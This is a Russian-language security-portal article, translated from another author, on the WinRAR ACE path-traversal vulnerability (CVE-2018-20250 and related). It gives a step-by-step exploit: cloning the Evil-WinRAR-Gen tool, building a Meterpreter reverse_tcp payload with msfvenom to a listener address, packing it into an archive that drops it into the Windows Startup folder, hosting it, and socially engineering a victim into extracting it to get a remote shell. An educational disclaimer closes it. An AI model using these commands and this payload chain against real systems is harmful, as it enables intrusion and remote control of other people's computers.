Уязвимость WinRAR: Code Execution

Дата: 21.10.2020. Автор: Игорь Б. Категории: Статьи по информационной безопасности
Уязвимость WinRAR: Code Execution

В этой статье пойдет речь об уязвимости WinRAR. Это одно из самых популярных в мире приложений для сжатия файлов, которое доступно на Windows. Злоумышленник может обмануть пользователя и получить доступ к его данным с помощью вредоносных архивов.

Эта уязвимость была выявлена в 2019 году компанией research.checkpoint.com. Она приложила свою руку ко всем версиям WinRAR, появившихся на рынке за последние 19 лет.

Идентификаторы уязвимостей: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 и CVE-2018-20253.

Пропатченная версия: WinRAR 5.70 Beta 1.

Эта уязвимость обусловлена тем, что библиотека UNACEV2.DLL входит в комплект поставки всех версий WinRAR. WinRAR использует формат ACE для сжатия папок и их распаковки с помощью UNACE.DLL.

В версиях WinRAR до 5.61 включительно существует уязвимость обхода пути при создании поля «filename» формата ACE (UNACEV2.dll). Когда поле «filename» обрабатывается с помощью определенных шаблонов, папка назначения (извлечения) игнорируется, таким образом рассматривается имя файла как абсолютный путь. Это происходит из-за неправильной компиляции.

Нужно скачать скрипт Python, который будет создавать вредоносные файловые архивы в формате RAR. После того как пользователь загрузит скрипт от Python, нужно установить зависимости, необходимые для его выполнения.

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt
Уязвимость WinRAR: Code Execution

Далее пользователь должен предоставить разрешение скрипту Python внутри папки Evil-Winrar-Gen, а затем сгенерировать вредоносный exe-файл с помощью Msfvenom и назвать его «winrar.exe», как показано ниже на картинке. Не стоит забыть и о роли Metasploit для успешного выполнения вредоносной программы.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe
Уязвимость WinRAR: Code Execution

Теперь пользователь создает текстовый файл, который будет показан жертве, когда он извлечет файлы из архива. Это запутает человека. Затем пользователь выполнит скрипт «evilwinrar python» вместе с вредоносным .exe и текстовым файлом, создав нужный ему архив, который он сможет отправить целевому объекту.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

Как уже было сказано, эта уязвимость позволяет пользователю извлечь вредоносный файл по произвольному пути. С помощью этого скрипта пользователь разрешает извлечение rar-файлов в программе /startup. Теперь нужно использовать социальную инженерию для передачи вредоносного .rar жертве. Стоит подождать, пока жертва перезагрузит свою машину, чтобы получить ее обратное соединение.

Уязвимость WinRAR: Code Execution

В настоящее время на целевой машине нет программы при запуске системы, как показано ниже. Как только жертва извлекает вредоносный файл rar «evil.rar», файл пользователя winrar.exe будет также извлекаться в программу запуска.

Уязвимость WinRAR: Code Execution

Чтобы быть уверенным, что файл winrar.exe находится в папке /startup, пользователю следует ввести «shell:startup» в командной строке.

Уязвимость WinRAR: Code Execution

Как только жертва перезагрузит свой компьютер, пользователь получит обратное соединение, как показано на рисунке ниже.

Уязвимость WinRAR: Code Execution

Автор переведенной статьи: Aarti Singh.

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Игорь Б

Об авторе Игорь Б

Автор на портале cisoclub.ru. Добавляйте ваш материал на сайт в разделе "Разместить публикацию".
Читать все записи автора Игорь Б

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *